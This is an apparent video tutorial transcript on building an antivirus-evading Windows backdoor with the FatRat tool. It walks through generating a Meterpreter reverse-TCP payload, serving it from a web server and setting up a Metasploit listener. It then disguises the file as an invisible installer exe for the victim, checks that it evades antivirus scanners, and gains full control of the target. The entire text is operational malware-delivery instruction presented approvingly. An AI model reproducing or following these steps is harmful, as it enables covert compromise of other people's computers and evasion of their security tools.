Okay, so welcome back. In this tutorial I'm going to show you how to create an undetectable backdoor or malicious file using the FatRat tool, which allows you to compile malware and bypass most antivirus programs. Now the FatRat is not installed in Kali Linux, so you need to install the tool by going to clone or download and copy the URL from here. Then open a terminal and type git clone and paste the URL. This may take some time depending on your internet connection. Once the download is complete, type ls to list the files and change directory to the FatRat folder and use ls again. Now here you need to change permissions for the setup.sh script by typing chmod +x setup.sh and press enter. And to run the installer, type /setup.sh and wait for the process to complete. And here you can select to run the FatRat from anywhere in the terminal. Now the installation is complete, so to run the tool just type FatRat. Okay, now let's see how to create the malicious file. And to do that I'm going to use option 6. And here I will select the first option, which will create a bad file. This type of file will work on all Windows computers, so that's why I'm going to use the first option. Then type your local IP address, which you can find by typing ifconfig, and the L port will be 8080. And for the output name I will use cc setup. And then it's going to ask me what type of payload do I want to use. So I will select Windows Meterpreter Reverse TCP and press enter to generate the file. Now the file will be stored to the output folder in the FatRat. So to go to the output folder, type cd the FatRat /output. And here if I use ls, you can see the bad file was successfully created. Now I will copy the file to var/www/html, which is the location for the Apache web server. And then I'm going to set the listener by typing msf console and use the following commands. Use exploit /multi/handler and set payload windows /meterpreter /reverse TCP. And then set the L host and put the local IP address. And for the L port, I will type the same port which I have used when I have created the file. And now type run to listen for connections. Okay, now let's switch to the Windows machine and download the malicious file by typing the local IP address from the Kali machine. And here you can see the bad file. So I will save the file on my desktop. Now the file doesn't look very friendly and is suspicious for the victim. So to make it more friendly for the victim, I'm going to use a program called Advanced Bad to exe converter, which you can find on this web address. Now to open the backdoor, I will go to File, Open and select the file. And here is the malicious code from the bad file. Now I will convert this to an exe format by clicking Build exe. And here make sure you select the invisible mode. This will make the file to run with no window. And then select icon, and in my case I will use the installer icon. Once done with that, click Build exe and type the name and select the location where you want to save the file. Now on my desktop you can see the backdoor is looking much better. Okay, now let's try to scan the file and see if the antivirus programs will detect the backdoor. So to do that I will use antiscan.me website and upload the file and click scan. And here you can see the backdoor is bypassing almost all antivirus programs, which is a really good result. Okay, now let's close this and run the file. And if I go back to the Kali machine, you can see a session has been opened. This means I have full control over the target machine. So that's it for now. Thanks for watching and I will see you next time.